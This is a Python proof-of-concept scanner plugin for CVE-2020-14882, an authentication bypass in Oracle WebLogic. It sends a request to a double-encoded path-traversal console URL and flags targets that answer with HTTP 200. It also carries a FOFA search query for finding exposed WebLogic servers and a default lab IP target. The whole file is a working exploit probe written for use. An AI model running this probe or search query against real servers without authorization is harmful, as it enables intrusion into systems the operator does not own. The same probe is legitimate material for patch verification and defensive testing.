# coding:utf-8
import requests
import urllib
import re
requests.packages.urllib3.disable_warnings()

class c2Class(object):
    def __init__(self):
        self.vulname = 'weblogic authencation bypass(CVE-2020-14882)'
        self.cveid='CVE-2020-14882'
        self.vulsystem= 'weblogic'
        self.vulversion = '10.3.6.0; 12.1.3.0; 12.2.1.3; 12.2.1.4; 14.1.1.0'
        self.findtime='2020-10'
        self.fofa='app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"'
        self.refer= 'https://blog.csdn.net/weixin_41598660/article/details/109409965'
        self.bbb='未授权访问'
        self.testisok=True

        self.headers={'User-Agent': 'Mozilla/5.0'}

        self.vulpath='/console/css/%252e%252e%2fconsole.portal'
        self.flag=200


    def c2Func(self,target):
        status=0
        returnData=''
        if target.startswith(('http://','https://')):
            # 这是为了拿到 <http://主机名>这样格式的数据
            target=target+'/'
            target=target[:target.find('/',8)] # 在https://、http://的协议开头之后寻找/
        else:
            target='http://'+target
        try:
            url=target.strip('/')+self.vulpath
            resp=requests.get(url=url,headers=self.headers,verify=False,timeout=5)
            # resp_content=str(resp.content)
            if self.flag == resp.status_code:
                returnData='%s is vuln(%s), vulpath:%s'%(target,self.vulname,url)
                status=1
        except Exception as e:
            # print(e)
            returnData=str(e)
        return status,returnData

if __name__ == '__main__':
    target='http://192.168.199.137:7001/'
    pocObj=c2Class()
    print(pocObj.c2Func(target))